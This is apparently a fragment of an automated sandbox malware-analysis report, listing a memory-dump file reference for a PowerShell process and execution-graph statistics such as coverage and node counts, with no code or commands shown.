                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:

Execution Graph

Execution Coverage: 4.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 34
Total number of Limit Nodes: 1

Control-flow Graph
